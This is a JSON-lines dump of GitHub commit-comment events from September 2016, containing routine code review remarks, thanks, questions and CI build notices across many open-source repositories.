{"id":"4581872468","type":"CommitCommentEvent","actor":{"login":"javihgil"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":19074936,"position":39,"line":259,"path":"FOSUserEvents.php","commit_id":"301f9cc96cac427e916945ce19860c55484ac2f4","created_at":"2016-09-19T08:03:52Z","updated_at":"2016-09-19T08:03:52Z","body":"Thanks @igorRovenki  for your fix!"}},"created_at":"2016-09-19T08:03:52Z"}
{"id":"4581872633","type":"CommitCommentEvent","actor":{"login":"krishnenthuchakra1977"},"repo":{"name":"krishnenthuchakra1977/imad-2016-app"},"payload":{"comment":{"id":19074937,"position":5,"line":8,"path":"ui/index.html","commit_id":"4008e5113e1e33384398a5780f34faaed5823b27","created_at":"2016-09-19T08:03:54Z","updated_at":"2016-09-19T08:03:54Z","body":"<img src=\"/ui/madi.png\" class=\"img-medium\"/>"}},"created_at":"2016-09-19T08:03:54Z"}
{"id":"4581873818","type":"CommitCommentEvent","actor":{"login":"Kmanfi"},"repo":{"name":"cliffordwolf/yosys"},"payload":{"comment":{"id":19074939,"position":null,"line":null,"path":null,"commit_id":"2c031cd24f536a35a32ce3c78d548fa627265557","created_at":"2016-09-19T08:04:16Z","updated_at":"2016-09-19T08:04:16Z","body":"Iverilog needs also fix to work properly with this Yosys fix.\r\nChange iverilog Makefile line\r\nCPPFLAGS = -DHAVE_CONFIG_H $(INCLUDE_PATH)\r\nto\r\nCPPFLAGS = -DHAVE_CONFIG_H $(INCLUDE_PATH) -DYY_BUF_SIZE=65536\r\n"}},"created_at":"2016-09-19T08:04:16Z"}
{"id":"4581875010","type":"CommitCommentEvent","actor":{"login":"orvice"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19074942,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T08:04:36Z","updated_at":"2016-09-19T08:04:36Z","body":"what??"}},"created_at":"2016-09-19T08:04:36Z"}
{"id":"4581876371","type":"CommitCommentEvent","actor":{"login":"Kostronor"},"repo":{"name":"Minecolonies/minecolonies"},"payload":{"comment":{"id":19074947,"position":7,"line":34,"path":"src/main/java/com/minecolonies/util/BlockPosUtil.java","commit_id":"b941fa1612cb1175cda49bd6333dd8e2d17759cc","created_at":"2016-09-19T08:04:56Z","updated_at":"2016-09-19T08:04:56Z","body":"You sure you wanted to remove this?"}},"created_at":"2016-09-19T08:04:56Z"}
{"id":"4581877411","type":"CommitCommentEvent","actor":{"login":"AlexStocks"},"repo":{"name":"anticpp/log4go"},"payload":{"comment":{"id":19074949,"position":null,"line":null,"path":null,"commit_id":"7d4329e23dfc67534e74eaed748b45a116829cd4","created_at":"2016-09-19T08:05:14Z","updated_at":"2016-09-19T08:05:14Z","body":"比较了下，没看出来你改这些代码有何必要"}},"created_at":"2016-09-19T08:05:14Z"}
{"id":"4581881729","type":"CommitCommentEvent","actor":{"login":"BenTristem"},"repo":{"name":"UnrealCourse/03_BuildingEscape"},"payload":{"comment":{"id":19074962,"position":null,"line":null,"path":null,"commit_id":"b74a2161bfdfb7875273de0be892f28330415c3a","created_at":"2016-09-19T08:06:26Z","updated_at":"2016-09-19T08:06:26Z","body":"Thanks for this feedback, a little later in the course we use Unreal's `ensure` macro to better protect this sort of thing. In the meantime, well done."}},"created_at":"2016-09-19T08:06:26Z"}
{"id":"4581885177","type":"CommitCommentEvent","actor":{"login":"davidromani"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":19074965,"position":null,"line":null,"path":null,"commit_id":"2df2f9c1b4cfe9933087458763b92e1da272e8cb","created_at":"2016-09-19T08:07:22Z","updated_at":"2016-09-19T08:07:22Z","body":"This is because I need to your local domain (espaikowo.dev or something like this) and add to reCaptcha config options. Tell me something and I'll fix it.\r\n\r\nThe main problem here, is that you must draw the reCaptcha widget **before** the send button."}},"created_at":"2016-09-19T08:07:22Z"}
{"id":"4581885516","type":"CommitCommentEvent","actor":{"login":"chaejinu"},"repo":{"name":"chaejinu/chaejinu.github.io"},"payload":{"comment":{"id":19074967,"position":4,"line":279,"path":"index.html","commit_id":"b04076de71bc29ce8c7dc1119f3742696cc7f6f5","created_at":"2016-09-19T08:07:28Z","updated_at":"2016-09-19T08:07:28Z","body":"\t\ttargetEle.find(\"img\").first().load(function(e) {"}},"created_at":"2016-09-19T08:07:28Z"}
{"id":"4581889729","type":"CommitCommentEvent","actor":{"login":"Sweetzlevel"},"repo":{"name":"khantaena/mzdbook"},"payload":{"comment":{"id":19074981,"position":5,"line":15,"path":"README.md","commit_id":"6698cdf68ea15a291dcf8959c3b043f55f1325bd","created_at":"2016-09-19T08:08:37Z","updated_at":"2016-09-19T08:08:37Z","body":"..\r\n"}},"created_at":"2016-09-19T08:08:37Z"}
{"id":"4581891092","type":"CommitCommentEvent","actor":{"login":"forno"},"repo":{"name":"agrirobo/arcsys2"},"payload":{"comment":{"id":19074987,"position":null,"line":null,"path":null,"commit_id":"ab7e318642a5be2204f9d3c5c9be204fd7a64808","created_at":"2016-09-19T08:09:01Z","updated_at":"2016-09-19T08:09:01Z","body":"revace is typo\r\nit mean reverse."}},"created_at":"2016-09-19T08:09:01Z"}
{"id":"4581892458","type":"CommitCommentEvent","actor":{"login":"qq714772696"},"repo":{"name":"qq714772696/-"},"payload":{"comment":{"id":19074989,"position":1,"line":1,"path":"README.md","commit_id":"adc00539b56e18e3a65ac6b6d3c3541a432c51c3","created_at":"2016-09-19T08:09:27Z","updated_at":"2016-09-19T08:09:27Z","body":"数据结构与算法 实验"}},"created_at":"2016-09-19T08:09:27Z"}
{"id":"4581893205","type":"CommitCommentEvent","actor":{"login":"gsmet"},"repo":{"name":"hibernate/hibernate-validator"},"payload":{"comment":{"id":19074991,"position":13,"line":134,"path":"engine/src/main/java/org/hibernate/validator/internal/xml/MetaConstraintBuilder.java","commit_id":"92466dd13202a1219b2a9d2cc9b6b46fe5e6c4ea","created_at":"2016-09-19T08:09:38Z","updated_at":"2016-09-19T08:09:38Z","body":"@gunnarmorling I'm not convinced by this change. Or, if you want to do this change, you need to be consistent across the file. See convertStringToReturnType for instance (I extracted this `if` from there)."}},"created_at":"2016-09-19T08:09:38Z"}
{"id":"4581894069","type":"CommitCommentEvent","actor":{"login":"chenry8844"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19074994,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T08:09:50Z","updated_at":"2016-09-19T08:09:50Z","body":"why?"}},"created_at":"2016-09-19T08:09:50Z"}
{"id":"4581901369","type":"CommitCommentEvent","actor":{"login":"giorgiosironi"},"repo":{"name":"elifesciences/builder"},"payload":{"comment":{"id":19075009,"position":null,"line":null,"path":null,"commit_id":"8be745f6d7c94bf89af45f638a2f08ac3ab93b1d","created_at":"2016-09-19T08:11:54Z","updated_at":"2016-09-19T08:11:54Z","body":"Substituted with an explicit call to `copy()`, which performs a shallow copy: https://github.com/elifesciences/builder/pull/52/files#diff-5535dcc0f0f3d30fa038dc1a5b1f1a3aR279"}},"created_at":"2016-09-19T08:11:54Z"}
{"id":"4581902982","type":"CommitCommentEvent","actor":{"login":"barrierwings-jay"},"repo":{"name":"barrierwings-jay/django_practice"},"payload":{"comment":{"id":19075011,"position":20,"line":20,"path":"mysite/blog/migrations/0010_post_owner.py","commit_id":"d29a4aae1598bc2b59b6c229bb3726c4b116bd15","created_at":"2016-09-19T08:12:23Z","updated_at":"2016-09-19T08:12:23Z","body":"test review"}},"created_at":"2016-09-19T08:12:23Z"}
{"id":"4581908854","type":"CommitCommentEvent","actor":{"login":"exlo89"},"repo":{"name":"Machplatzwennduunsaufderstrassesiehst/Mental"},"payload":{"comment":{"id":19075027,"position":null,"line":null,"path":null,"commit_id":"5c7a453811015cc45fddd339168a46773418487f","created_at":"2016-09-19T08:13:59Z","updated_at":"2016-09-19T08:13:59Z","body":"Sven wann bist du eigentlich wieder in BS?"}},"created_at":"2016-09-19T08:13:59Z"}
{"id":"4581910652","type":"CommitCommentEvent","actor":{"login":"mudoudou"},"repo":{"name":"mudoudou/Dubbo"},"payload":{"comment":{"id":19075030,"position":null,"line":null,"path":null,"commit_id":"c4adb7891588f5c28ea18a541b9558a63ebee29e","created_at":"2016-09-19T08:14:29Z","updated_at":"2016-09-19T08:14:29Z","body":"ok"}},"created_at":"2016-09-19T08:14:29Z"}
{"id":"4581915344","type":"CommitCommentEvent","actor":{"login":"ishmaelt3"},"repo":{"name":"wallon-ines/redmine_shib_auth"},"payload":{"comment":{"id":19075033,"position":null,"line":null,"path":null,"commit_id":"32d23cec170c34e737577c5a2862ff0f55130637","created_at":"2016-09-19T08:15:41Z","updated_at":"2016-09-19T08:15:41Z","body":"Hi,\r\n\r\nSo all config but still having problem with session timeout.\r\n"}},"created_at":"2016-09-19T08:15:41Z"}
{"id":"4581920184","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19075038,"position":null,"line":null,"path":null,"commit_id":"68891ddf9816ea279c513ba95414a138a20e28f3","created_at":"2016-09-19T08:16:59Z","updated_at":"2016-09-19T08:16:59Z","body":"This change was causing build errors. Server is not capable of 6,000 random roll. Working on an alternative"}},"created_at":"2016-09-19T08:16:59Z"}
{"id":"4581927550","type":"CommitCommentEvent","actor":{"login":"mfaywu"},"repo":{"name":"mfaywu/job-search-tool"},"payload":{"comment":{"id":19075048,"position":null,"line":null,"path":null,"commit_id":"9250e012a0a164b7e164a4b6efbacf3272d55355","created_at":"2016-09-19T08:18:59Z","updated_at":"2016-09-19T08:18:59Z","body":"#4 Add tags. Uses react-tagsinput from npm [https://www.npmjs.com/package/react-tagsinput](url)\r\nCurrently has an issue with displaying on the list of companies (need to remove \"Add Tags\" and style so that it's apparent that changing the tags are disabled from here. "}},"created_at":"2016-09-19T08:18:59Z"}
{"id":"4581929337","type":"CommitCommentEvent","actor":{"login":"ryouaki"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19075049,"position":null,"line":null,"path":null,"commit_id":"e4ecb8822028910ceef6240ecf49d2dd70998dcc","created_at":"2016-09-19T08:19:28Z","updated_at":"2016-09-19T08:19:28Z","body":"good ，so fast"}},"created_at":"2016-09-19T08:19:28Z"}
{"id":"4581933296","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"BoxOfDevs/BoxOfBits"},"payload":{"comment":{"id":19075055,"position":null,"line":null,"path":null,"commit_id":"1014a4af2550215892a9045cb3c9ede077f780f6","created_at":"2016-09-19T08:20:30Z","updated_at":"2016-09-19T08:20:30Z","body":"Lol"}},"created_at":"2016-09-19T08:20:30Z"}
{"id":"4581933395","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19075057,"position":null,"line":null,"path":null,"commit_id":"e4ecb8822028910ceef6240ecf49d2dd70998dcc","created_at":"2016-09-19T08:20:32Z","updated_at":"2016-09-19T08:20:32Z","body":"https://github.com/ant-design/ant-design/commit/7233b9a908dc23674c699fa421bf3ee701d1fdf0"}},"created_at":"2016-09-19T08:20:32Z"}
{"id":"4581934344","type":"CommitCommentEvent","actor":{"login":"zhaocai"},"repo":{"name":"JanJoris/oh-my-posh"},"payload":{"comment":{"id":19075063,"position":16,"line":21,"path":"Themes/Agnoster.psm1","commit_id":"272ddfcefe89f5034bc628107ce350d88340d88c","created_at":"2016-09-19T08:20:46Z","updated_at":"2016-09-19T08:20:46Z","body":"Maybe we can use customizable symbol instead of space for the **PowerLine start**."}},"created_at":"2016-09-19T08:20:46Z"}
{"id":"4581938662","type":"CommitCommentEvent","actor":{"login":"DavidDudson"},"repo":{"name":"BBartosz/scalameta-macros-examples"},"payload":{"comment":{"id":19075071,"position":6,"line":16,"path":"macros/src/main/scala/Mappable.scala","commit_id":"5856d262b8f94243502074b1d097bd6b838e512d","created_at":"2016-09-19T08:21:52Z","updated_at":"2016-09-19T08:21:52Z","body":"In case you didnt know, the actual reason you need this is in scala.meta, Type.Name, Term.Name, Term.Arg.Name and Ctor.Ref.Name are all different. This is so you don't accidentally put a term.arg in for a term.name when you don't know what you are doing. In Elysium. Ive created a wrapper trait that the ADT gets enriched with so that the conversion is easier https://github.com/DavidDudson/Elysium/blob/master/manipulate/src/main/scala/nz/daved/elysium/manipulate/traits/HasName.scala"}},"created_at":"2016-09-19T08:21:52Z"}
{"id":"4581938938","type":"CommitCommentEvent","actor":{"login":"VladlenVasiliev"},"repo":{"name":"VladlenVasiliev/lab6_1"},"payload":{"comment":{"id":19075072,"position":10,"line":8,"path":"main.c","commit_id":"faffe3eaddbfd8630467182c56b1fec36c9b0431","created_at":"2016-09-19T08:21:56Z","updated_at":"2016-09-19T08:21:56Z","body":"Say hello there"}},"created_at":"2016-09-19T08:21:56Z"}
{"id":"4581940218","type":"CommitCommentEvent","actor":{"login":"joshiejack"},"repo":{"name":"PenguinSquad/Harvest-Festival"},"payload":{"comment":{"id":19075074,"position":null,"line":null,"path":null,"commit_id":"0e71564e04e4f99d07e964bcac2e653701cb8877","created_at":"2016-09-19T08:22:17Z","updated_at":"2016-09-19T08:22:17Z","body":"No, when I have desire to mod, but I can't work on mariculture because i can't move on because this isn't peacefully released, I need something to do, this was out of boredom :/. Soon I'll end up adding more features, because I need to pass the time somehow, but I don't want to. It's like I  had an addictive drug taken away. I'll manage though =p"}},"created_at":"2016-09-19T08:22:17Z"}
{"id":"4581940336","type":"CommitCommentEvent","actor":{"login":"djboersma"},"repo":{"name":"OpenGATE/Gate"},"payload":{"comment":{"id":19075075,"position":null,"line":null,"path":null,"commit_id":"45ec64f5da73e1efa12b6b91738ff0f319ddf8bc","created_at":"2016-09-19T08:22:18Z","updated_at":"2016-09-19T08:22:18Z","body":"For my curiosity: from the comments in this script I conclude that apparently there is a bug in Geant4 and for this particular script you are bypassing this with a small translation. This triggers many questions.\r\n- does this bug only happen in your special example or should all users do such a translation?\r\n- which geant4 versions have this bug, do you know if it is reported & fixed already?\r\n- if it does not look like the bug will be fixed in geant4, shouldn't we try to do something in Gate to work around it?\r\n- etc"}},"created_at":"2016-09-19T08:22:18Z"}
{"id":"4581943161","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075077,"position":null,"line":null,"path":null,"commit_id":"28d7c75c5dadd380e6866a9b78bf76c7f546a52b","created_at":"2016-09-19T08:22:55Z","updated_at":"2016-09-19T08:22:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1036](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13466&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-19T08:22:55Z"}
{"id":"4581945273","type":"CommitCommentEvent","actor":{"login":"zhaocai"},"repo":{"name":"JanJoris/oh-my-posh"},"payload":{"comment":{"id":19075086,"position":41,"line":41,"path":"Themes/Agnoster.psm1","commit_id":"272ddfcefe89f5034bc628107ce350d88340d88c","created_at":"2016-09-19T08:23:29Z","updated_at":"2016-09-19T08:23:29Z","body":"Is it easy to use symbol to separate drive potions like in \r\n![extra symbols for powerline]( https://raw.githubusercontent.com/ryanoasis/powerline-extra-symbols/master/preview.png )"}},"created_at":"2016-09-19T08:23:29Z"}
{"id":"4581946590","type":"CommitCommentEvent","actor":{"login":"saurabhmathur96"},"repo":{"name":"IEEECS-VIT/GPL"},"payload":{"comment":{"id":19075089,"position":null,"line":null,"path":null,"commit_id":"fb3485593e5a61942843145a9cea0db9d7738c5f","created_at":"2016-09-19T08:23:50Z","updated_at":"2016-09-19T08:23:50Z","body":"There seems to be an issue with JS minification. \r\nJS that is using jQuery gets minified to invalid JS. For eg. `/min/home.js`\r\n```\r\n$(document).a(function(){$(\".accordion-section-content\").b(),$(\".accordion-section-title\").c(\"click\",function(){var c=$(this).d(\"href\");$(c).e()})});\r\n```\r\n( $(document).a is undefined )\r\n\r\nWeirdly, this happens only on heroku. On localhost, it works as expected."}},"created_at":"2016-09-19T08:23:50Z"}
{"id":"4581947160","type":"CommitCommentEvent","actor":{"login":"ryouaki"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19075091,"position":null,"line":null,"path":null,"commit_id":"7233b9a908dc23674c699fa421bf3ee701d1fdf0","created_at":"2016-09-19T08:23:58Z","updated_at":"2016-09-19T08:23:58Z","body":"其实不太建议这种固定像素的写法，很容易引起显示错误。\r\n为什么不用比如 rem ，em这种，配合media。做响应式布局。"}},"created_at":"2016-09-19T08:23:58Z"}
{"id":"4581947262","type":"CommitCommentEvent","actor":{"login":"cliffordwolf"},"repo":{"name":"cliffordwolf/yosys"},"payload":{"comment":{"id":19075092,"position":null,"line":null,"path":null,"commit_id":"2c031cd24f536a35a32ce3c78d548fa627265557","created_at":"2016-09-19T08:24:00Z","updated_at":"2016-09-19T08:24:00Z","body":"Not sure what exactly to do with that because I leave it to the user to install iverilog..\r\n\r\nHowever, does commit 5e155aa fix the original issue with autotest.sh and modules with a large number of ports?"}},"created_at":"2016-09-19T08:24:00Z"}
{"id":"4581947518","type":"CommitCommentEvent","actor":{"login":"Sunil1132"},"repo":{"name":"Sunil1132/hello-world"},"payload":{"comment":{"id":19075094,"position":null,"line":null,"path":null,"commit_id":"438897acbee76abbe2070b90820473920eb90d6c","created_at":"2016-09-19T08:24:05Z","updated_at":"2016-09-19T08:24:05Z","body":"Its initial stage of the project"}},"created_at":"2016-09-19T08:24:05Z"}
{"id":"4581948156","type":"CommitCommentEvent","actor":{"login":"apoclyps"},"repo":{"name":"apoclyps/belfast-cares"},"payload":{"comment":{"id":19075097,"position":null,"line":null,"path":null,"commit_id":"9bd84c95b940453a99e5535800b4dc8fa5ce7c45","created_at":"2016-09-19T08:24:15Z","updated_at":"2016-09-19T08:24:15Z","body":"Commit looks good. \r\n\r\nMerge development into this branch locally, then resolve any conflicts, push back up to the origin service worker repo and then open a pull request into apoclyps/developement. When you do that I'll review it. "}},"created_at":"2016-09-19T08:24:15Z"}
{"id":"4581951273","type":"CommitCommentEvent","actor":{"login":"DavidDudson"},"repo":{"name":"BBartosz/scalameta-macros-examples"},"payload":{"comment":{"id":19075105,"position":6,"line":16,"path":"macros/src/main/scala/Mappable.scala","commit_id":"5856d262b8f94243502074b1d097bd6b838e512d","created_at":"2016-09-19T08:25:04Z","updated_at":"2016-09-19T08:25:04Z","body":"the leftmost one should actually be valid with just paramName though, You may possibly need to extract it as `q\"${paramName: Term.Name}\"` I can't actually remember if Term.Arg has its own Term.Arg.Name class... "}},"created_at":"2016-09-19T08:25:04Z"}
{"id":"4581955329","type":"CommitCommentEvent","actor":{"login":"tomolimo"},"repo":{"name":"trasher/glpi"},"payload":{"comment":{"id":19075116,"position":8,"line":387,"path":"inc/dbmysql.class.php","commit_id":"81a693f1c775aa73a1608a856202e208b0e3219f","created_at":"2016-09-19T08:26:01Z","updated_at":"2016-09-19T08:26:01Z","body":"Is the space ' ' in  'BASE TABLE ' mandatory? Or a wrongly inserted char?"}},"created_at":"2016-09-19T08:26:01Z"}
{"id":"4581957790","type":"CommitCommentEvent","actor":{"login":"phillipberndt"},"repo":{"name":"phillipberndt/autorandr"},"payload":{"comment":{"id":19075127,"position":59,"line":800,"path":"autorandr.py","commit_id":"bae286948aaeced03357adccfb14d1ce84a568d1","created_at":"2016-09-19T08:26:36Z","updated_at":"2016-09-19T08:26:36Z","body":"The `ps e` output is much harder to parse than the envioron file in procfs. (It is, in fact, impossible to parse, because it doesn't perform any quoting/escaping in its output. It'll have identical output for an environment `foo=\"bar baz=qux\"` and one `foo=bar baz=qux`. For `foo=\"bar=\"`, parsing necessarily fails for *all* consecutive variables.)\r\n\r\nSo this wouldn't make this part of the script more reliable."}},"created_at":"2016-09-19T08:26:36Z"}
{"id":"4581961586","type":"CommitCommentEvent","actor":{"login":"tkhgsh"},"repo":{"name":"a1630ty/sinatra_enpit"},"payload":{"comment":{"id":19075136,"position":null,"line":null,"path":null,"commit_id":"6a3a37ed8eca2e8dda8b6b5a493f7c1b4a319edb","created_at":"2016-09-19T08:27:31Z","updated_at":"2016-09-19T08:27:31Z","body":":+1: "}},"created_at":"2016-09-19T08:27:31Z"}
{"id":"4581966989","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19075149,"position":null,"line":null,"path":null,"commit_id":"abf3e9ca31dc225586e171431d5a0d804fb660dc","created_at":"2016-09-19T08:28:54Z","updated_at":"2016-09-19T08:28:54Z","body":"This is a combo of two different ideas. I don't think maintainers will accept this as a valid combo:\r\nhttps://github.com/glinscott/fishtest/wiki/Fishtest-faq#what-is-an-union-patch\r\n\r\nAlso see discussion at:\r\nhttps://github.com/ajithcj/Stockfish/compare/ca6c9f8...fd95e85\r\n\r\nBesides, I see that snicolet is not done with his attempts at the flanks idea.\r\nhttp://tests.stockfishchess.org/tests/view/57df99460ebc59763f358b1d"}},"created_at":"2016-09-19T08:28:54Z"}
{"id":"4581968525","type":"CommitCommentEvent","actor":{"login":"BBartosz"},"repo":{"name":"BBartosz/scalameta-macros-examples"},"payload":{"comment":{"id":19075157,"position":6,"line":16,"path":"macros/src/main/scala/Mappable.scala","commit_id":"5856d262b8f94243502074b1d097bd6b838e512d","created_at":"2016-09-19T08:29:17Z","updated_at":"2016-09-19T08:29:17Z","body":"This is what I suspected, thx for pointing this. New quasiquotes api seems much more typesafe in terms of building/modifying ast. "}},"created_at":"2016-09-19T08:29:17Z"}
{"id":"4581970013","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075162,"position":null,"line":null,"path":null,"commit_id":"e4a4de3df417de6b9aeeb23bb7da0cf91e1cee85","created_at":"2016-09-19T08:29:39Z","updated_at":"2016-09-19T08:29:39Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1037](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13469&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-19T08:29:39Z"}
{"id":"4581970216","type":"CommitCommentEvent","actor":{"login":"vomar"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19075163,"position":null,"line":null,"path":null,"commit_id":"cbf8daa595c741a6f77c62249b868ddfec8feef9","created_at":"2016-09-19T08:29:43Z","updated_at":"2016-09-19T08:29:43Z","body":"NPC Update."}},"created_at":"2016-09-19T08:29:43Z"}
{"id":"4581970250","type":"CommitCommentEvent","actor":{"login":"Kmanfi"},"repo":{"name":"cliffordwolf/yosys"},"payload":{"comment":{"id":19075164,"position":null,"line":null,"path":null,"commit_id":"2c031cd24f536a35a32ce3c78d548fa627265557","created_at":"2016-09-19T08:29:43Z","updated_at":"2016-09-19T08:29:43Z","body":"I put it here for Yosys users using iverilog as a FYI."}},"created_at":"2016-09-19T08:29:43Z"}
{"id":"4581971269","type":"CommitCommentEvent","actor":{"login":"stefannyagustina"},"repo":{"name":"stefannyagustina/stefanny.github.io"},"payload":{"comment":{"id":19075168,"position":null,"line":null,"path":null,"commit_id":"46d517bda386b6d42bc67c1236498ea65dbb6c7d","created_at":"2016-09-19T08:30:00Z","updated_at":"2016-09-19T08:30:00Z","body":"Initial Commit"}},"created_at":"2016-09-19T08:30:00Z"}
{"id":"4581972069","type":"CommitCommentEvent","actor":{"login":"danmar"},"repo":{"name":"Maalli/myDiffTool"},"payload":{"comment":{"id":19075172,"position":null,"line":null,"path":null,"commit_id":"13ffb5158ec2525d55de2061f1fb804768c4e4f8","created_at":"2016-09-19T08:30:16Z","updated_at":"2016-09-19T08:30:16Z","body":"kommentarer.."}},"created_at":"2016-09-19T08:30:16Z"}
{"id":"4581972855","type":"CommitCommentEvent","actor":{"login":"zapster"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":19075174,"position":null,"line":null,"path":null,"commit_id":"a09799f25a602f3664ac8c6fcae97b20fc48a685","created_at":"2016-09-19T08:30:25Z","updated_at":"2016-09-19T08:30:25Z","body":"We saw this too so thanks for the fix!"}},"created_at":"2016-09-19T08:30:25Z"}
{"id":"4581978254","type":"CommitCommentEvent","actor":{"login":"mvuorenmaa"},"repo":{"name":"robotframework/remoteswinglibrary"},"payload":{"comment":{"id":19075188,"position":33,"line":89,"path":"src/main/java/org/robotframework/remoteswinglibrary/agent/FindAppContextWithWindow.java","commit_id":"326dbbdf45a986035bdb982f1b0008fcc2fc080e","created_at":"2016-09-19T08:31:43Z","updated_at":"2016-09-19T08:31:43Z","body":"This might be coming a bit late, but it's been working fine since the correction."}},"created_at":"2016-09-19T08:31:43Z"}
{"id":"4581978276","type":"CommitCommentEvent","actor":{"login":"ryancheung"},"repo":{"name":"EmberEmu/Ember"},"payload":{"comment":{"id":19075189,"position":13,"line":112,"path":"src/login/main.cpp","commit_id":"1ccb801b5c304cc5a65f2508c7b3e12f8d46e07c","created_at":"2016-09-19T08:31:44Z","updated_at":"2016-09-19T08:31:44Z","body":"So with the patch and survey feature, we're able to check if client is using cheat hacks or custom model patches?  @Chaosvex "}},"created_at":"2016-09-19T08:31:44Z"}
{"id":"4581980446","type":"CommitCommentEvent","actor":{"login":"charlierui"},"repo":{"name":"charlierui/spring-mvc"},"payload":{"comment":{"id":19075192,"position":null,"line":null,"path":null,"commit_id":"f7802e82e4fcd08060068b125e27ebab53ddc7bf","created_at":"2016-09-19T08:32:17Z","updated_at":"2016-09-19T08:32:17Z","body":"test"}},"created_at":"2016-09-19T08:32:17Z"}
{"id":"4581981119","type":"CommitCommentEvent","actor":{"login":"danmar"},"repo":{"name":"danmar/cppcheck"},"payload":{"comment":{"id":19075194,"position":null,"line":null,"path":null,"commit_id":"997a3cd9cacad255a5e68e3e6b77ded26f65998d","created_at":"2016-09-19T08:32:26Z","updated_at":"2016-09-19T08:32:26Z","body":"thanks! I'll look at this."}},"created_at":"2016-09-19T08:32:26Z"}
{"id":"4581986751","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075200,"position":6,"line":6,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"50f7c41ae4c92c45f753a408458e3041df227e99","created_at":"2016-09-19T08:33:50Z","updated_at":"2016-09-19T08:33:50Z","body":"Class could use some documentation on what it does. It's not immediately clear from the name."}},"created_at":"2016-09-19T08:33:50Z"}
{"id":"4581988907","type":"CommitCommentEvent","actor":{"login":"monsta"},"repo":{"name":"mate-desktop/mate-netbook"},"payload":{"comment":{"id":19075201,"position":null,"line":null,"path":null,"commit_id":"5fc95c71a4ade8d19f996586fe5750da66d2207e","created_at":"2016-09-19T08:34:23Z","updated_at":"2016-09-19T08:34:23Z","body":"Ok, done, uploaded to /var/local/tarballs as usual."}},"created_at":"2016-09-19T08:34:23Z"}
{"id":"4581993183","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075207,"position":null,"line":null,"path":null,"commit_id":"28d7c75c5dadd380e6866a9b78bf76c7f546a52b","created_at":"2016-09-19T08:35:28Z","updated_at":"2016-09-19T08:35:28Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1036](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13466&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 239, ignored: 3 Build time: 00:12:33"}},"created_at":"2016-09-19T08:35:28Z"}
{"id":"4581993226","type":"CommitCommentEvent","actor":{"login":"jackpoz"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19075206,"position":null,"line":null,"path":null,"commit_id":"f07fe63e50062941dd99ce719f27f6d09ecfbd7d","created_at":"2016-09-19T08:35:28Z","updated_at":"2016-09-19T08:35:28Z","body":"your comment clearly shows you didn't understand anything of the commit message or the modified code"}},"created_at":"2016-09-19T08:35:28Z"}
{"id":"4581994757","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075213,"position":20,"line":20,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"50f7c41ae4c92c45f753a408458e3041df227e99","created_at":"2016-09-19T08:35:51Z","updated_at":"2016-09-19T08:35:51Z","body":"This debug code still exists at the moment in Master."}},"created_at":"2016-09-19T08:35:51Z"}
{"id":"4581995544","type":"CommitCommentEvent","actor":{"login":"stefannyagustina"},"repo":{"name":"stefannyagustina/stefanny.github.io"},"payload":{"comment":{"id":19075215,"position":null,"line":null,"path":null,"commit_id":"5da2b714215fca5bdf1c7136523617e2a4fbb648","created_at":"2016-09-19T08:36:05Z","updated_at":"2016-09-19T08:36:05Z","body":"stefanny.github.io/index.html"}},"created_at":"2016-09-19T08:36:05Z"}
{"id":"4581996844","type":"CommitCommentEvent","actor":{"login":"benjycui"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19075219,"position":5,"line":86,"path":"components/style/core/base.less","commit_id":"9042e139b3298a5f807f7d3dd388ffe356cb3caf","created_at":"2016-09-19T08:36:22Z","updated_at":"2016-09-19T08:36:22Z","body":"发现业务线/业务组件使用了这个样式，然后这也是常用的样式，或者还是要保留这个？不然升级时会碰到不少布局错乱的问题。"}},"created_at":"2016-09-19T08:36:22Z"}
